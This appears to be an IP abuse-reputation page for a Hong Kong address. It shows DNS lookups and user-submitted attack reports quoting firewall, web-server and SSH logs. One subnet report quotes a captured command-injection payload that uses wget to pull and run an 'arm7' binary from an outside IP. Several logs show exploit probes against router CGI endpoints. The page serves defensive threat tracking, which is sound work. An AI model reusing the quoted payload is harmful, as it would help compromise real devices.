218.253.242.28

Basic Info

City: Central

Region: Central and Western District

Country: Hong Kong

Internet Service Provider: HKBN Enterprise Solutions HK Limited

Hostname: unknown

Organization: unknown

Usage Type: Data Center/Web Hosting/Transit

Comments:

Make a comment on this IP

Type	Details	Datetime
attack	Seq 2995002506	2019-10-22 04:09:54

Comments on same subnet:

IP	Type	Details	Datetime
218.253.242.224	attackspam	"Remote Command Execution: Unix Command Injection - Matched Data: ;chmod found within ARGS:remote_host: ;cd /tmp;wget h://142.11.199.235/arm7;chmod 777 arm7;./arm7;rm -rf arm7;#"	2020-07-08 15:11:13
218.253.242.36	attack	Automatic report - Port Scan Attack	2019-11-29 23:12:59
218.253.242.115	attack	[Sat Nov 23 12:36:17.260077 2019] [:error] [pid 26036] [client 218.253.242.115:44858] [client 218.253.242.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 18)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "127.0.0.1"] [uri "/cgi-bin/ViewLog.asp"] [unique_id "XdlR8OyVvAr7DjkOb0K9UAAAAAY"] ...	2019-11-24 03:54:49
218.253.242.215	attackspam	218.253.242.215 [11/Oct/2019:23:06:18 +0100] "POST /cgi-bin/ViewLog.asp HTTP/1.1" 218.253.242.215 [11/Oct/2019:23:06:18 +0100] "teSubmit=Save"	2019-10-12 20:30:05
218.253.242.151	attack	Ref: mx Logwatch report	2019-10-06 21:02:44
218.253.242.151	attackbotsspam	2019/10/04 19:51:45 [error] 7916#7916: 3959 open() "/srv/automx/instance/cgi-bin/ViewLog.asp" failed (2: No such file or directory), client: 218.253.242.151, server: autoconfig.tuxlinux.eu, request: "POST /cgi-bin/ViewLog.asp HTTP/1.1", host: "127.0.0.1" 2019/10/05 05:47:27 [error] 7917#7917: 4041 open() "/srv/automx/instance/cgi-bin/ViewLog.asp" failed (2: No such file or directory), client: 218.253.242.151, server: autoconfig.tuxlinux.eu, request: "POST /cgi-bin/ViewLog.asp HTTP/1.1", host: "127.0.0.1" ...	2019-10-05 17:34:54

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 218.253.242.28
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 3249
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;218.253.242.28.			IN	A

;; AUTHORITY SECTION:
.			414	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019102101 1800 900 604800 86400

;; Query time: 64 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Tue Oct 22 04:09:49 CST 2019
;; MSG SIZE  rcvd: 118

Host info

28.242.253.218.in-addr.arpa domain name pointer static.reserve.wtt.net.hk.

Nslookup info:

Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
28.242.253.218.in-addr.arpa	name = static.reserve.wtt.net.hk.

Authoritative answers can be found from:

Related IP info:

Related comments:

IP	Type	Details	Datetime
202.80.219.149	attackspam	Attempt to attack host OS, exploiting network vulnerabilities, on 24-02-2020 04:55:21.	2020-02-24 14:58:56
36.79.185.42	attack	Attempt to attack host OS, exploiting network vulnerabilities, on 24-02-2020 04:55:24.	2020-02-24 14:52:07
222.186.15.33	attackspambots	Feb 24 03:14:56 firewall sshd[1506]: Failed password for root from 222.186.15.33 port 21197 ssh2 Feb 24 03:17:45 firewall sshd[1551]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.15.33 user=root Feb 24 03:17:47 firewall sshd[1551]: Failed password for root from 222.186.15.33 port 64239 ssh2 ...	2020-02-24 14:42:57
202.181.234.199	attack	Unauthorized connection attempt detected from IP address 202.181.234.199 to port 1433	2020-02-24 14:35:46
54.39.131.56	attack	Brute force attack against VPN service	2020-02-24 14:48:37
87.236.212.51	attack	Feb 24 07:05:27 debian-2gb-nbg1-2 kernel: \[4783529.039613\] \[UFW BLOCK\] IN=eth0 OUT= MAC=96:00:00:0e:18:f4:d2:74:7f:6e:37:e3:08:00 SRC=87.236.212.51 DST=195.201.40.59 LEN=40 TOS=0x00 PREC=0x00 TTL=245 ID=10617 PROTO=TCP SPT=43666 DPT=60021 WINDOW=1024 RES=0x00 SYN URGP=0	2020-02-24 14:39:01
36.81.127.194	attack	1582520198 - 02/24/2020 05:56:38 Host: 36.81.127.194/36.81.127.194 Port: 445 TCP Blocked	2020-02-24 14:28:01
58.212.139.229	attackbotsspam	Feb 24 04:49:58 localhost sshd\[3410\]: Invalid user ftpuser from 58.212.139.229 Feb 24 04:55:43 localhost sshd\[4059\]: Invalid user feedbackalueducation@123 from 58.212.139.229 Feb 24 04:56:00 localhost sshd\[4114\]: Invalid user ftpuser from 58.212.139.229 ...	2020-02-24 14:39:41
45.148.10.171	attackbotsspam	45.148.10.171 - - [24/Feb/2020:10:28:33 +0400] "POST /GponForm/diag_Form?style/ HTTP/1.1" 502 157 "-" "curl/7.3.2" ...	2020-02-24 14:47:45
220.132.141.138	attack	Automatic report - Port Scan Attack	2020-02-24 14:46:34
36.76.110.141	attackspam	Attempt to attack host OS, exploiting network vulnerabilities, on 24-02-2020 04:55:23.	2020-02-24 14:53:09
36.68.237.252	attack	SMB Server BruteForce Attack	2020-02-24 14:50:28
14.162.151.171	attack	Attempt to attack host OS, exploiting network vulnerabilities, on 24-02-2020 04:55:17.	2020-02-24 15:05:40
36.92.159.11	attackspambots	1582523059 - 02/24/2020 06:44:19 Host: 36.92.159.11/36.92.159.11 Port: 445 TCP Blocked	2020-02-24 14:51:51
185.143.223.171	attackspam	Feb 24 07:16:14 grey postfix/smtpd\[28295\]: NOQUEUE: reject: RCPT from unknown\[185.143.223.171\]: 554 5.7.1 Service unavailable\; Client host \[185.143.223.171\] blocked using truncate.gbudb.net\; http://www.gbudb.com/truncate/ \[185.143.223.171\]\; from=\<0by0egk8uqci4@evacuator-msk.ru\> to=\ proto=ESMTP helo=\<\[185.143.223.163\]\> ...	2020-02-24 14:25:58

Recently Reported IPs

89.7.201.18	175.124.97.51	183.138.35.45	120.90.69.71
183.91.218.45	66.194.72.179	223.140.58.31	185.221.44.206
180.175.133.33	113.78.200.189	140.240.247.216	140.154.103.212
121.23.163.151	222.136.99.243	181.27.246.90	158.182.19.194
202.87.87.222	129.240.134.198	119.50.60.122	116.52.225.81